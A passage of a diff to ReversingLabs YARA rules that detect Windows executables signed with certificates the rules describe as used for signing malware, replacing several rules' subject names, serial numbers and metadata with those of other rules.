-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOG Co., Ltd." and pe.signatures [ i ] . serial == "66:e3:f0:b4:45:9f:15:ac:7f:2a:2b:44:99:0d:d7:09" and 1320288125 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Solar LLC" and pe.signatures [ i ] . serial == "6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "de018b47-9fbd-590e-b3d1-b50029496718"
+		id = "e6914a29-f6f7-56fc-8606-95666d31cf33"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16248-L16264"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9276-L9292"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21055,21 +45720,21 @@ rule REVERSINGLABS_Cert_Blocklist_610039D6349Ee531E4Caa3A65D100C7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment" and pe.signatures [ i ] . serial == "61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a"
+		id = "7bd6616b-fef7-56aa-a78a-606601afa4f3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16266-L16282"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9294-L9310"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21079,21 +45744,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LivePlex Corp" and pe.signatures [ i ] . serial == "1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650"
+		id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16284-L16300"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9312-L9328"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21103,21 +45768,21 @@ rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" and 1386806400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "28a56bcf-1f13-5478-a6d5-7595464da198"
+		id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16302-L16318"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7c1bec5059d40fc326bb08775888ed169abc746228eeb42c897f479992c5acab"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9330-L9346"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21127,21 +45792,21 @@ rule REVERSINGLABS_Cert_Blocklist_58015Acd501Fc9C344264Eace2Ce5730 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nanjing Ranyi Technology Co., Ltd. " and pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" and 1352246400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78bfa550-d85e-5776-a65d-ff0039abd2c4"
+		id = "0c306a1f-e810-5988-a44c-964b6a67c918"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16320-L16336"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca00f1adacd6ff16e54b85be38c3a4545a10c76548e0647f7f3f6cfa4dff412d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9348-L9364"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21151,21 +45816,21 @@ rule REVERSINGLABS_Cert_Blocklist_0B7279068Beb15Ffe8060D2C56153C35 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "977d9686-d811-5416-b090-d4f45d7935d0"
+		id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16338-L16354"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9366-L9382"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21175,21 +45840,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foresee Consulting Inc." and pe.signatures [ i ] . serial == "0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures [ i ] . serial == "01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d09658e4-44e4-5c10-a866-ba486000f1b6"
+		id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16356-L16374"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9384-L9400"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21199,21 +45864,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CodeDance Ltd" and ( pe.signatures [ i ] . serial == "00:ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" or pe.signatures [ i ] . serial == "ca:9b:6f:49:b8:b4:12:04:a1:74:c7:51:c7:3d:c3:93" ) and 1654646400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ccb36b8b-301d-5cc2-9c8e-4956b92c1116"
+		id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16376-L16394"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "390d074da09d8e5b4bb2a6f4157a5125474ab5c22de62729d4fc4075edade289"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9402-L9418"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21223,21 +45888,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aaf65B8E7A2E68Bc8C9E8F27331B795C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA L LIMITED" and ( pe.signatures [ i ] . serial == "00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures [ i ] . serial == "aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" ) and 1549324800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d748bea4-8d2b-53b2-8184-ea0972ad9199"
+		id = "614f88ca-183a-548b-99f1-30cf4c4027ce"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16396-L16414"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9420-L9436"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21247,21 +45912,21 @@ rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE COMPANY OF WORDS LTD" and ( pe.signatures [ i ] . serial == "00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures [ i ] . serial == "c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" ) and 1549324800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0389d5ba-4535-5277-9c77-bd178e66417f"
+		id = "34594a57-f9fd-5b9d-afb6-691be33da9b5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16416-L16434"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9438-L9454"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21271,21 +45936,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and ( pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures [ i ] . serial == "ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" ) and 1554940800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "308a73cd-a142-56ad-8dca-808ab455b43e"
+		id = "f7358f71-421f-57fa-abdf-ab479f4b7007"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16436-L16454"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9456-L9472"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21295,21 +45960,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" or pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" ) and 1650931200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Idris Kanchwala Holding Corp." and pe.signatures [ i ] . serial == "0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f9fa6c6-372d-5948-94ba-9e3fee956647"
+		id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16456-L16472"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "71da69fca275caead6a822e6587e0a07fc882f712afeafe18f4a595c269f6737"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9474-L9492"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
